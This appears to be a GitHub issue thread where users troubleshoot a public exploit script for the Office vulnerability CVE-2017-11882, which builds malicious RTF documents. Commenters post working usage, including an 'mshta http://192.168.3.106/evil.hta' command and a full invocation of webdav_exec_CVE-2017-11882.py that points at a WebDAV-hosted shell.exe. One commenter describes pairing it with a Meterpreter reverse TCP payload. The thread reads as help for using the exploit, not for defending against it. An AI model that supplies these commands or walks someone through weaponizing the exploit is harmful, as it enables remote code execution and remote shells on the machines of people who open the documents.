Open securitaydude opened 7 years ago
X0R1972
commented
7 years ago Thank you guy for this question .my self i tried the same think like you... i write the command like you but for me it simply not working .; when i open office doc in windows nothing happens.. it coud be nice if the owner of this exploit show us the right syntax and command to use so whe now exactly what to put in command.
ptyin
commented
7 years ago First thing first you should use URL instead of UNC. This URL is your server location, and the -e option should be an command(like "mshta http://192.168.3.106/evil.hta" ) under your server location. The second thing is that I think your -u and -e options are too long to use. They should be shorter than 43 bytes. (MY ENGLISH IS HORRIBLE, SORRY ABOUT THAT
isabellah750
commented
7 years ago How do you tell you server location without the ip address? Kindly help me understand how it is working. And can it work on LAN
X0R1972
commented
7 years ago another question ..i hope its not a stupid one if yes Sorry.. does this exploit work only in local or also in wan ?
Greetings. It appears that in order for this script to work(for me), I had to supply the following arguments to the script:
python webdav_exec_CVE-2017-11882.py -u \\\\192.168.x.x\\webdav -e \\\\192.168.x.x\\webdav\\shell.exe -o text.rtf. Otherwise, if I did this:python webdav_exec_CVE-2017-11882.py -u \\192.168.x.x\webdav -e \\192.168.x.x\webdav\shell.exe -o text.rtf, I would get an error from Word sayingcould not find resource from \192.168.x.xwebdav. It appears that the python script, on my end, needed the backslash character to escape the backslash. I was able to weaponize (I think) this exploit using Meterpreter's handler and a Meterpreter reverse tcp payload. However, when I enter the WebDAV path in Windows using win+R, Windows somehow opens ups the webdav location in explorer before the meterpreter session could be established. Is anyone else or you experiencing this? Is this normal behavior?